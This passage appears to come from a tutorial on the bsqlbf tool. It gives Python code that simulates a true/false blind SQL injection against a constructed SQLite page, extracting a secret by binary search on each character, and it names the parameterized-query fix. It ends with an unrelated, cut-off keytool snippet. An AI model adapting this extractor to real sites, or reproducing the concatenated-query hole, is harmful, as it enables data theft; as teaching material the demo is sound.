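As an added example (our own code, not bsqlbf's), here is the Type 0 attack simulated end to end in Python: a constructed SQLite-backed page that concatenates an integer parameter into its query and reveals only whether a record was found, and an extractor that recovers a column value with one binary search per character. The table, the secret and the subquery are constructed for the demo.

```python
import sqlite3


def make_app():
    # Constructed target: one table with a value the attacker wants to read.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'Z3bra!')")
    return conn


def vulnerable_page(conn, user_id):
    """Simulated endpoint with an integer parameter pasted into the query.
    The only thing the attacker observes is whether a record is displayed."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


class Oracle:
    """Type 0 (True/False) oracle: a true condition shows the record, a false one does not."""

    def __init__(self, conn):
        self.conn = conn
        self.queries = 0

    def ask(self, condition):
        self.queries += 1
        return vulnerable_page(self.conn, "1 AND (" + condition + ")")


def extract(oracle, subquery, max_len=32):
    """Recover the result of `subquery` one character at a time, binary
    searching each code point (7 requests per character for 7-bit text)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)
            if oracle.ask(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # substr past the end yields '' and unicode('') is NULL, so every
            # comparison was false: the string is finished.
            break
        out += chr(lo)
    return out


def demo():
    oracle = Oracle(make_app())
    secret = extract(oracle, "SELECT secret FROM users WHERE name = 'admin'")
    return secret, oracle.queries


if __name__ == "__main__":
    print(demo())
```

Against a real target the oracle's `ask` would send an HTTP request with the condition in the parameter and compare the page against the known true and false responses; the rest of the code stays the same. A parameterized query on the server side, as under item 2 above, makes the oracle answer the same way for every condition and the extraction yields nothing.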

How to Change JKS KeyStore Private Key Password

Use following keytool command to change the key store password >keytool  -storepasswd  -new [new password ]  -keystore  [path to key stor...